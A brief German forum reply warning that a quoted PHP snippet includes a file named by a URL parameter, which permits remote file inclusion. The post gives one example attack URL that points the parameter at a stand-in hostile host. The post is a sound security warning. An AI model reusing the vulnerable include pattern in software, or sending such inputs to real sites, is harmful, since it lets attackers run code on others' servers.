Andreas Waidelich: CMS Smarty

Beitrag lesen

Hallo,

Ohne auf das eigentlich Thema Deines Threads einzugehen, ein Hinweis zu folgendem Code, der ein Sicherheitproblem darstellen kann.

<div class="nav">
  <a href="index.php?page=seite1.htm">Home</a><br>
  ...
</div>
<div class="content><?php include($page); ?></div>

Folgendes kann möglich sein: http://deine-seite.de/index.php?page=http://boese.de

Mit freundlichen Grüßen,
Andreas Waidelich

--
signatures eat bandwidth